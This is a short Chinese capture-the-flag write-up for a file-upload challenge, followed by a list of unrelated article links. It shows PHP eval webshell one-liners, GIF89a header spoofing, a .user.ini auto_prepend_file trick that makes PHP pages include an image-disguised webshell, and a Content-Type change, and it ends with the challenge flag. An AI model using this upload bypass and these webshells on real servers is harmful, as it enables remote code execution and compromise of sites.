CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
北漂Zachary2 小时前
Laravel 10.x 新特性全面解析
php·laravel
pencek5 小时前
HackMyVM-Azer
网络安全
2401_827499999 小时前
python项目实战10-网络机器人03
开发语言·python·php
达不溜的日记10 小时前
CAN总线网络传输层CanTp详解
网络·stm32·嵌入式硬件·网络协议·网络安全·信息与通信·信号处理
xinhuanjieyi10 小时前
php setplayersjson实现类型转换和文件锁定机制应对高并发
android·开发语言·php
藤原千花的败北10 小时前
云存储AccessKey泄露漏洞(oss AK/SK)
网络安全
xixixi7777712 小时前
从5G标准到6G前沿:Polar码的技术演进与未来之路
开发语言·人工智能·5g·大模型·php·通信·polar码
2401_8858850412 小时前
视频短信接口集成起来复杂吗?API接入说明
开发语言·php·音视频
zopple12 小时前
PHP与Vue.js:前后端开发的完美搭档
开发语言·vue.js·php
北漂Zachary13 小时前
Laravel 8.x核心特性全解析
php·laravel